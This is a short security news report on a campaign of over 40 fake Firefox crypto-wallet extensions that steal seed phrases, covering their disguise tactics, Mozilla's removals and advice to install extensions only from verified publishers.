Cybersecurity researchers have identified over 40 malicious browser extensions for Mozilla Firefox designed to steal cryptocurrency wallet credentials, thereby jeopardizing users’ digital assets. These extensions masquerade as legitimate wallet tools from widely-used platforms such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox.
The large-scale campaign has been active since at least April 2025, with new extensions uploaded to the Firefox Add-ons store as recently as last week. These malicious add-ons artificially inflate their popularity by adding hundreds of 5-star reviews, creating an illusion of authenticity and tricking unsuspecting users into installing them. Additionally, the threat actors use the same names and logos as legitimate wallet tools to bolster trust.
By cloning the source code of open-source extensions and injecting malicious functionality, these rogue extensions extract wallet keys and seed phrases from targeted websites and exfiltrate them to a remote server. They also transmit victims’ external IP addresses. Unlike typical phishing scams that rely on fake websites or emails, these extensions operate inside the user’s browser, making them harder to detect or block with traditional endpoint tools.
The presence of Russian language comments in the source code and metadata from a PDF file retrieved from the command-and-control server used for the activity points to a Russian-speaking threat actor group.
All identified add-ons, except for MyMonero Wallet, have since been removed by Mozilla. Last month, Mozilla announced the development of an early detection system to identify and block scam crypto wallet extensions before they gain popularity and are used to steal users’ assets by tricking them into entering their credentials.
To mitigate the risk posed by such threats, it’s advised to install extensions only from verified publishers and vet them to ensure they don’t silently change their behavior post-installation.
